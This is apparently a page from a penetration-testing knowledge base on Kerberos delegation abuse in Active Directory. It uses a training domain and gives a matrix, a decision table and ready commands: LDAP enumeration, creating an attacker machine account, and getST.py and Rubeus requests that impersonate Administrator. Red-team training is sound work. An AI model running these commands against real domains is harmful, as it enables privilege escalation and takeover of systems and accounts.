Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 03. Kerberos / Delegation

Matrix

TypeConfigured onMain attributeWhat we needKerberos flowLinux abuseWindows abuseMain risk
Unconstrained delegationDelegating account or computerTRUSTED_FOR_DELEGATIONCompromise the delegated host, then wait for or coerce users/computers to authenticateVictim TGT is cached on the delegated hostCoerce authentication, extract tickets if tooling and access permitRubeus.exe monitor, Rubeus.exe dump, Mimikatz ticket extractionAny delegated TGT can be reused to access services as that principal
Constrained delegation with protocol transitionDelegating accountTRUSTED_TO_AUTH_FOR_DELEGATION and msDS-AllowedToDelegateToControl the delegating account password, hash, AES key, or TGTS4U2Self then S4U2ProxygetST.py -spn <allowed_spn> -impersonate <user>Rubeus.exe s4u /impersonateuser:<user> /msdsspn:<allowed_spn>Impersonate arbitrary users to allowed SPNs
Constrained delegation without protocol transitionDelegating accountmsDS-AllowedToDelegateTo without protocol transition flagControl delegating account and capture a real user TGS to the front-end serviceS4U2Proxy only with captured user service ticketLimited, depends on captured TGS handlingRubeus.exe s4u /tgs:<captured_tgs> /msdsspn:<allowed_spn>Impersonate only users whose front-end service tickets were captured
Service-name substitutionFinal service ticketCleartext sname in returned TGSA valid delegated ticket to one service class on the same host/accountModify final service class with altservicegetST.py -altservice cifs/<host>Rubeus.exe s4u /altservice:cifsConvert a less useful service ticket into CIFS, LDAP, HTTP, or HOST when service keys match
RBCDTarget computer objectmsDS-AllowedToActOnBehalfOfOtherIdentityWrite access to target computer object and control of a principal with an SPNS4U2Self then S4U2Proxyaddcomputer.py, rbcd.py or ntlmrelayx.py --delegate-access, getST.pyPowermad, PowerView raw security descriptor, Rubeus s4uGain service tickets to the target as a chosen user
RBCD through relayTarget computer objectmsDS-AllowedToActOnBehalfOfOtherIdentityRelay a machine or user to LDAP/LDAPS with permission to write RBCDLDAP write then S4Untlmrelayx.py -t ldaps://dc --delegate-access --escalate-user <machine$>Usually staged from Linux relay toolingTurn coercion plus LDAP relay into target-host compromise
S4U2Self computer takeoverComputer account TGTComputer account key or stolen TGTA computer TGT for the target computerS4U2Self with /self, then service substitutionUsually easier from Windows toolingRubeus.exe s4u /self /altservice:cifs/<host>Convert a captured computer TGT into usable local service access as an impersonated user

Decision table

FindingNext action
TRUSTED_FOR_DELEGATION on a non-DC hostCompromise host, monitor for TGTs, coerce high-value authentication
msDS-AllowedToDelegateTo and protocol transition enabledControl delegating account, run S4U as target user
msDS-AllowedToDelegateTo without protocol transitionCapture a real user TGS to the front-end service, then S4U2Proxy
Writable msDS-AllowedToActOnBehalfOfOtherIdentity on a computerCreate or control SPN principal, write RBCD, request S4U ticket
MachineAccountQuota greater than zeroCreate controlled machine account for RBCD if no SPN principal is available
Delegation target is not usefulTry altservice to request or substitute CIFS, LDAP, HTTP, HOST, or WSMAN on the same host/account

UAC flags

FlagDecimalMeaning
TRUSTED_FOR_DELEGATION524288Unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION16777216Protocol transition for constrained delegation
NOT_DELEGATED1048576Account is sensitive and cannot be delegated

Quick commands

GoalCommand
Find all delegationfindDelegation.py ootw.local/student:'student' -dc-ip 10.10.10.200
Find unconstrainedldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(userAccountControl:1.2.840.113556.1.4.803:=524288)' sAMAccountName dNSHostName servicePrincipalName userAccountControl
Find constrainedldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(msDS-AllowedToDelegateTo=*)' sAMAccountName msDS-AllowedToDelegateTo userAccountControl
Find protocol transitionldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(userAccountControl:1.2.840.113556.1.4.803:=16777216)' sAMAccountName userAccountControl msDS-AllowedToDelegateTo
Find RBCD already setldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(objectCategory=computer)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))' distinguishedName sAMAccountName msDS-AllowedToActOnBehalfOfOtherIdentity
Create machineaddcomputer.py -computer-name 'ATTACKER01$' -computer-pass 'Password123!' -dc-ip $DC ootw.local/student:'student'
Abuse constrained delegationgetST.py -spn 'cifs/server.ootw.local' -impersonate Administrator -dc-ip $DC 'ootw.local/svc_delegate:Password123!'
Abuse RBCDgetST.py -spn 'cifs/target.ootw.local' -impersonate Administrator -dc-ip $DC 'ootw.local/ATTACKER01$:Password123!'